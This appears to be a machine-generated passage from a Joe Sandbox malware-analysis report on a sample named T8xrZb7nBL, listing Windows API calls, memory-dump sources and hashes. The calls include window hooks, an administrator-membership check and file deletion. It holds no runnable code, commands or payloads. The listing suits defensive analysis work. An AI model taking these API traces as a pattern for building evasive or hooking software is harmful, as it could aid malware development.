                                                      • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                      • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                      • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                      • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                      • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                      • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                      • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                      APIs
                                                      • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: FileTime
                                                      • String ID:
                                                      • API String ID: 1425588814-0
                                                      • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                      • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                      • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                      • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@
                                                      • String ID:
                                                      • API String ID: 1033339047-0
                                                      • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                      • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                      • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                      • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@
                                                      • String ID:
                                                      • API String ID: 1033339047-0
                                                      • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                      • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                      • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                      • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                      APIs
                                                      • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                      • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                      • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                      • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                      • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                      • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                      • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                      • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                      • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                      • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09
                                                      APIs
                                                      • _wtol.MSVCRT ref: 00403882
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                      • _wtol.MSVCRT ref: 00403A1C
                                                      • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                      • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                      • String ID: .lnk
                                                      • API String ID: 408529070-24824748
                                                      • Opcode ID: 4687d314d8fb75ddd968a622cf46a6a3741478a6a9264fdec0cf1fdc409c438a
                                                      • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                      • Opcode Fuzzy Hash: 4687d314d8fb75ddd968a622cf46a6a3741478a6a9264fdec0cf1fdc409c438a
                                                      • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                      • wsprintfW.USER32 ref: 004021E7
                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                      • GetLastError.KERNEL32 ref: 00402201
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                      • GetLastError.KERNEL32 ref: 00402236
                                                      • lstrcmpiW.KERNEL32(009B8FD0,00404926), ref: 0040224B
                                                      • ??3@YAXPAX@Z.MSVCRT(009B8FD0), ref: 0040225B
                                                      • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                      • SetLastError.KERNEL32(?), ref: 00402282
                                                      • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                      • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                      • _wtol.MSVCRT ref: 00402314
                                                      • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,009B8FD0,00000002), ref: 00402334
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                      • String ID: 7zSfxString%d
                                                      • API String ID: 2117570002-3906403175
                                                      • Opcode ID: 61fc492217b0d1498c682d736bcbac8f2805dd0a68d8671c1b433b8af2a6413a
                                                      • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                      • Opcode Fuzzy Hash: 61fc492217b0d1498c682d736bcbac8f2805dd0a68d8671c1b433b8af2a6413a
                                                      • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                      • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                      • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                      • wsprintfW.USER32 ref: 00401E7F
                                                      • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                      • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                      • API String ID: 2639302590-365843014
                                                      • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                      • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                      • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                      • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                      APIs
                                                      • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                      • GetLastError.KERNEL32 ref: 00408DF4
                                                      • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                      • lstrlenW.KERNEL32(?), ref: 00408E44
                                                      • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                      • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                      • LocalFree.KERNEL32(?), ref: 00408E9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                      • String ID:
                                                      • API String ID: 829399097-0
                                                      • Opcode ID: 8224ad20a8e9884b22f8a248acad8e8a60057fadc3095306321e9517c3750734
                                                      • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                      • Opcode Fuzzy Hash: 8224ad20a8e9884b22f8a248acad8e8a60057fadc3095306321e9517c3750734
                                                      • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                      • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                      • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                      • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                      • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                      • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                      • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                      • String ID:
                                                      • API String ID: 1862581289-0
                                                      • Opcode ID: 92f2922bb31e58a36d0fd1269f7fa419c1fabea0f355f97580af1b0c87fe8d09
                                                      • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                      • Opcode Fuzzy Hash: 92f2922bb31e58a36d0fd1269f7fa419c1fabea0f355f97580af1b0c87fe8d09
                                                      • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                      • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                      • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                      • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                      • EndDialog.USER32(?,00000000), ref: 0040869A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: CurrentHookThreadWindows$Dialog
                                                      • String ID:
                                                      • API String ID: 1967849563-0
                                                      • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                      • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                      • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                      • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                      • FreeSid.ADVAPI32(?), ref: 004024A2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                      • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                      • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                      • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                      • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                      • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                      • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
